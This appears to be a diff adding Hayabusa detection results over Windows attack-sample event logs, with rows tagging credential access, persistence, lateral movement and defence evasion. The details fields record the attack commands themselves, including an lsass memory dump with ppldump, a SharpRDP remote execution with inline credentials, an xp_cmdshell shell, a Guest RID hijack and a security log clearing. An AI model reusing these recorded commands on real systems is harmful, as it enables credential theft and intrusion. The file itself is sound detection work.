+2019-09-03 20:04:58.463 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-06 22:49:35.433 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
+2019-09-06 22:49:39.823 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 747F3D96-3944-5D72-0000-001019773200,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
+2019-09-06 23:58:44.918 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
+2019-09-09 04:14:54.471 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
+2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
+2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
+2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
+2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
+2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
+2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
+2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 747F3D96-2842-5E1E-0000-00100C417A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 747F3D96-28B3-5E1E-0000-00101DF17B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 747F3D96-2910-5E1E-0000-001053F57C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
+2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-01-24 04:09:34.660 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
+2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.876 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:13.098 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 17:28:13.147 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
